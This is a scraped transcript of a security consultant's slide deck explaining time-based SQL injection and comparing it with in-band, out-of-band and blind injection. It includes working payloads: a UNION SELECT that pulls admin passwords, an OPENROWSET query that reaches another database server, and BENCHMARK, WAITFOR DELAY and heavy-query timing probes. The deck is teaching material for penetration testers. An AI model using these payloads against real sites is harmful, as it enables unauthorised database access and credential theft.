Time based sql injection
Download
1 / 27

- PowerPoint PPT Presentation


  • 564 Views
  • Updated On :

Time Based SQL Injection. Presented by Muhaimin Dzulfakar. Who am I. Muhaimin Dzulfakar Security Consultant – Security-Assessment.com Application and network pen-tester. Agenda. What is time based SQL Injection Differences between blind and time based SQL Injection

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about '' - keita


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Time based sql injection l.jpg
Time Based SQL Injection

Presented by Muhaimin Dzulfakar


Who am i l.jpg
Who am I

  • Muhaimin Dzulfakar

  • Security Consultant – Security-Assessment.com

  • Application and network pen-tester


Agenda l.jpg
Agenda

  • What is time based SQL Injection

  • Differences between blind and time based SQL Injection

  • Time based injection with heavy queries

  • Limitation of time based SQL Injection


Different types of sql injection l.jpg
Different types of SQL Injection

  • In Band Injection

  • Out of Band Injection

  • Blind SQL Injection

  • Time Based SQL Injection


In band injection l.jpg
In Band Injection

  • Results are embedded via union select

  • Useful when SQL error message is displayed

  • Fastest way to extract data

  • Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*



Out of band injection l.jpg
Out of Band Injection

  • Use a different communication channel to drill for data

    Ex: Web Mail application in which data received via SMTP is

    processed

  • Example of attack: Accessing your neighbour database server with OOB injection

    Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT

    a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;

    Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT

    user, pass FROM users') AS a--


Out of band injection8 l.jpg
Out of Band Injection

www.buyviagra.com

Web server

OOB Injection

Database A

Database B

10.1.1.1


Blind sql injection l.jpg
Blind SQL Injection

  • Application generates custom error message for failed response and normal page for successful response

  • Comparison between true and false response

  • AND 1=1 -> true AND 1=2 -> false

  • Read data byte by byte




Time based sql injection12 l.jpg
Time Based SQL Injection

  • Use time delay to differentiate between true and false

  • True response – time delay is executed

  • Failed response – time delay is not executed

  • Read data byte by byte – exactly the same method as blind injection

  • First example by Chris Anley's paper – More advanced SQL Injection

  • Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference


When we need time based sql injection l.jpg
When we need Time Based SQL Injection

When the application generates default page for true or false response

When the application generates the same custom error page for true or false response

Injection is successful but can't be seen by the attacker


Scenario 1 blind injection attack l.jpg
Scenario 1 (Blind Injection attack)

$default=1

if value is not between 1-20

{

redirect user to page.php?id=$default

execute SQL statement

}

1 AND 1=1 [TRUE] -> default page displayed

1 AND 1=2 [FALSE] -> default page displayed

BLIND INJECTION FAILED!


Scenario 1 time based blind injection attack l.jpg
Scenario 1(Time Based Blind Injection attack)‏

$default=1

if value is not between 1-20

{

redirect user to page.php?id=$default

execute SQL statement

}

1 AND 1=1 [TRUE] -> takes 5 seconds to response

1 AND 1=2 [FALSE] -> takes 1 second to response

TIME BASED BLIND INJECTION

WORKS!


Time based sql injection16 l.jpg
Time Based SQL Injection

FALSE = 117ms

TRUE = 2478ms


Spot the different l.jpg
Spot the different

Blind Injection (for MySql)‏

1 AND ASCII(substring((@@version),1,1))<52

If the first character of the database version is less than 4,

it is true

If the first character of database version is 4 or more, it is

false

position

query

operator

char


Spot the different18 l.jpg
Spot the different

Time Based Blind injection (for MySQL)‏

1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))‏

If the first character of database version is less than 4,

execute BENCHMARK

If the first character of database version is not less than

4,do not execute BENCHMARK

char

count time

operator

time delay

query

position


Time based injection on mssql l.jpg
Time Based Injection on MSSQL

Time Based Injection (MSSQL)‏

1 AND if not(substring((select @version),25,1) < 52)‏

waitfor delay '0:0:9'--

If the first character less than 4, execute “waitfor delay”

query

time delay

position

operator

char


Other databases l.jpg
Other Databases

Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions

Time Based Injection is possible by using heavy queries

Chema Alonso and Jose Prada talked about this in Defcon 2008

2 types of conditions in 'where clause'

Light Condition first

Heavy Condition first

Select A from B where ConditionA and ConditionB


Heavy condition first l.jpg
Heavy condition first

Heavy condition

100sec

Light Condition

10sec

Heavy & Light Condition

Result

True

False

False

110 Seconds

True

True

True

110 Seconds

False

-

False

100 Seconds

Result from Alonso research


Light condition first l.jpg
Light condition first

Light condition

10sec

Heavy Condition

100sec

Heavy & Light Condition

Result

True

False

False

110 Seconds

True

True

True

110 Seconds

False

-

False

10Seconds

Result from Alonso research


Heavies queries l.jpg
Heavies Queries

Oracle evaluates the conditions from left to right

MS Access evaluates the conditions from right to left

MSSQL evaluates light condition first

Table name needs to be known

Some of the well known default tables

MSSQL – sysussers

MySQL – information_schema.colums

Oracle - all_users


Heavies queries24 l.jpg
Heavies Queries

Example of time based injection using heavy queries on MSSQL (light condition evaluates first)‏

1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)‏

Suitable for databases that do not support time delay functions

Ex: Oracle and MS Access

heavy query

light query


Limitation l.jpg
Limitation

Results are not efficient during the busy times

Time delay results also depend on how much data stored in the table




ad